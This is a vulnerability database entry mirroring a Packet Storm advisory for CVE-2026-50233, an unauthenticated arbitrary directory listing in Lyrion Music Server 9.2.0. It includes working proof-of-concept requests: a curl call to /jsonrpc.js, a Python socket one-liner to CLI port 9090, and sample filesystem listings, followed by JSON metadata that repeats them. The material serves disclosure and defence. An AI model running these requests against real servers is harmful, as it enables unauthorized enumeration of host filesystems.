📄 Lyrion Music Server 9.2.0 Arbitrary Directory Listing_PACKETSTORM:222810

6.9 / 10

MEDIUM

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/SC:N/VI:N/SI:N/VA:N/SA:N

Description

Lyrion Music Server version 9.2.0 exposes a readdirectory query through both its CLI service TCP port 9090 and its HTTP JSON-RPC endpoint /jsonrpc.js that takes a folder parameter and lists its contents with no restriction to the configured media...

Visit Original Source

Basic Information

ID PACKETSTORM:222810

Published Jun 5, 2026 at 00:00

Affected Product

Affected Versions Lyrion Music Server 9.2.0 Arbitrary Directory Listing

Vendor: LMS Community
Product web page: https://www.lyrion.org
Affected version 9.2.0

Summary: Lyrion Music Server (formerly Logitech Media Server, and
often abbreviated as "LMS" ) is open-source software which can control
and serve (stream) music to a wide range of physical and virtual audio
players called Squeezeboxes. Lyrion Music Server can stream your local
music collection, internet radio stations, and content from many streaming
services (with and without subscriptions). The Command Line Interface
plugin allows Squeezebox software and the players to be controlled remotely
over a TCP/IP connection, for example by a third party automation system
like AMX or Crestron.

Desc: Lyrion Music Server exposes a readdirectory query through both its
CLI service (TCP port 9090) and its HTTP JSON-RPC endpoint (/jsonrpc.js)
that takes a folder parameter and lists its contents with no restriction
to the configured media directories and no authentication in the default
configuration. A remote attacker on the network can enumerate arbitrary
locations on the host filesystem.

Tested on: Windows 10 (64-bit) - EN
Lyrion Music Server (9.2.0 - 1779973211)
Perl/5.32.1
SQLite

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2026-5991
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5991
CVE ID: CVE-2026-50233
CVE URL: https://www.cve.org/CVERecord?id=CVE-2026-50233

27.05.2026

--

$ curl http://localhost:9000/jsonrpc.js \
> -d "{\"id\":1,\"method\":\"slim.request\",\"params\":[\"\",[\"readdirectory\",\"0\",\"100\",\"folder:C:\\users\"]]}"

{"result":{"fsitems_loop":[{"path":"C:\\users\\.NET v4.5","isfolder":"1","name":".NET v4.5"},{"name":".NET v4.5 Classic","isfolder":"1","path":"C:\\users\\.NET v4.5 Classic"},{"name":"DefaultAppPool","isfolder":"1","path":"C:\\users\\DefaultAppPool"},{"isfolder":"1","name":"defaultuser0","path":"C:\\users\\defaultuser0"},{"path":"C:\\users\\testuser","isfolder":"1","name":"testuser"},{"isfolder":"1","name":"Public","path":"C:\\users\\Public"}],"count":6},"id":1,"method":"slim.request","params":["",["readdirectory","0","100","folder:C:\\users"]]}

$ python -c "import socket,urllib.parse,pprint; s=socket.socket(); s.connect(('127.0.0.1',9090)); s.sendall(b'readdirectory 0 100 folder:C:\r\\n'); raw=s.recv(65535).decode(); s.close(); txt=urllib.parse.unquote(raw); parts=txt.split(); items=[]; cur={}; [ (items.append(cur) or (cur:={})) if k=='path' and cur else cur.update({k:v}) for k,v in (p.split(':',1) for p in parts if ':' in p) ]; items.append(cur); pprint.pprint(items)"
[{'count': '14', 'folder': 'C:'},
{'isfolder': '1', 'name': 'BIOS'},
{'isfolder': '1', 'name': 'drivers'},
{'isfolder': '1', 'name': 'Intel'},
{'isfolder': '1', 'name': 'jython2.7.0'},
{'isfolder': '1', 'name': 'OpenSSL-Win32'},
{'isfolder': '1', 'name': 'PaintToolSAI'},
{'isfolder': '1', 'name': 'Program'},
{'isfolder': '1', 'name': 'Program'},
{'isfolder': '1', 'name': 'Temp'},
{'isfolder': '1', 'name': 'Users'},
{'isfolder': '1', 'name': 'Windows'},
{'isfolder': '1', 'name': 'xampp'},
{'isfolder': '', 'name': 'test.txt'},
{'isfolder': '', 'name': 'NTUSER.dat'}]

{
    "lastseen": "2026-06-05T18:15:01",
    "description": "Lyrion Music Server version 9.2.0 exposes a readdirectory query through both its CLI service TCP port 9090 and its HTTP JSON-RPC endpoint /jsonrpc.js that takes a folder parameter and lists its contents with no restriction to the configured media...",
    "published": "2026-06-05T00:00:00",
    "modified": "2026-06-05T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Lyrion Music Server 9.2.0 Arbitrary Directory Listing",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222810",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-50233"
    ],
    "sourceData": "Lyrion Music Server 9.2.0 Arbitrary Directory Listing\n    \n    \n    Vendor: LMS Community\n    Product web page: https://www.lyrion.org\n    Affected version 9.2.0\n    \n    Summary: Lyrion Music Server (formerly Logitech Media Server, and\n    often abbreviated as \"LMS\" ) is open-source software which can control\n    and serve (stream) music to a wide range of physical and virtual audio\n    players called Squeezeboxes. Lyrion Music Server can stream your local\n    music collection, internet radio stations, and content from many streaming\n    services (with and without subscriptions). The Command Line Interface\n    plugin allows Squeezebox software and the players to be controlled remotely\n    over a TCP/IP connection, for example by a third party automation system\n    like AMX or Crestron.\n    \n    Desc: Lyrion Music Server exposes a readdirectory query through both its\n    CLI service (TCP port 9090) and its HTTP JSON-RPC endpoint (/jsonrpc.js)\n    that takes a folder parameter and lists its contents with no restriction\n    to the configured media directories and no authentication in the default\n    configuration. A remote attacker on the network can enumerate arbitrary\n    locations on the host filesystem.\n    \n    Tested on: Windows 10 (64-bit) - EN\n               Lyrion Music Server (9.2.0 - 1779973211)\n               Perl/5.32.1\n               SQLite\n    \n    \n    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n                                @zeroscience\n    \n    \n    Advisory ID: ZSL-2026-5991\n    Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5991\n    CVE ID: CVE-2026-50233\n    CVE URL: https://www.cve.org/CVERecord?id=CVE-2026-50233\n    \n    \n    27.05.2026\n    \n    --\n    \n    \n    $ curl http://localhost:9000/jsonrpc.js \\\n    > -d \"{\\\"id\\\":1,\\\"method\\\":\\\"slim.request\\\",\\\"params\\\":[\\\"\\\",[\\\"readdirectory\\\",\\\"0\\\",\\\"100\\\",\\\"folder:C:\\\\users\\\"]]}\"\n    \n    {\"result\":{\"fsitems_loop\":[{\"path\":\"C:\\\\users\\\\.NET v4.5\",\"isfolder\":\"1\",\"name\":\".NET v4.5\"},{\"name\":\".NET v4.5 Classic\",\"isfolder\":\"1\",\"path\":\"C:\\\\users\\\\.NET v4.5 Classic\"},{\"name\":\"DefaultAppPool\",\"isfolder\":\"1\",\"path\":\"C:\\\\users\\\\DefaultAppPool\"},{\"isfolder\":\"1\",\"name\":\"defaultuser0\",\"path\":\"C:\\\\users\\\\defaultuser0\"},{\"path\":\"C:\\\\users\\\\testuser\",\"isfolder\":\"1\",\"name\":\"testuser\"},{\"isfolder\":\"1\",\"name\":\"Public\",\"path\":\"C:\\\\users\\\\Public\"}],\"count\":6},\"id\":1,\"method\":\"slim.request\",\"params\":[\"\",[\"readdirectory\",\"0\",\"100\",\"folder:C:\\\\users\"]]}\n    \n    \n    $ python -c \"import socket,urllib.parse,pprint; s=socket.socket(); s.connect(('127.0.0.1',9090)); s.sendall(b'readdirectory 0 100 folder:C:\\r\\\\n'); raw=s.recv(65535).decode(); s.close(); txt=urllib.parse.unquote(raw); parts=txt.split(); items=[]; cur={}; [ (items.append(cur) or (cur:={})) if k=='path' and cur else cur.update({k:v}) for k,v in (p.split(':',1) for p in parts if ':' in p) ]; items.append(cur); pprint.pprint(items)\"\n    [{'count': '14', 'folder': 'C:'},\n     {'isfolder': '1', 'name': 'BIOS'},\n     {'isfolder': '1', 'name': 'drivers'},\n     {'isfolder': '1', 'name': 'Intel'},\n     {'isfolder': '1', 'name': 'jython2.7.0'},\n     {'isfolder': '1', 'name': 'OpenSSL-Win32'},\n     {'isfolder': '1', 'name': 'PaintToolSAI'},\n     {'isfolder': '1', 'name': 'Program'},\n     {'isfolder': '1', 'name': 'Program'},\n     {'isfolder': '1', 'name': 'Temp'},\n     {'isfolder': '1', 'name': 'Users'},\n     {'isfolder': '1', 'name': 'Windows'},\n     {'isfolder': '1', 'name': 'xampp'},\n     {'isfolder': '', 'name': 'test.txt'},\n     {'isfolder': '', 'name': 'NTUSER.dat'}]",
    "sourceHref": "https://packetstorm.news/download/222810",
    "cvss": {
        "score": 6.9,
        "severity": "MEDIUM",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/SC:N/VI:N/SI:N/VA:N/SA:N",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222810/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply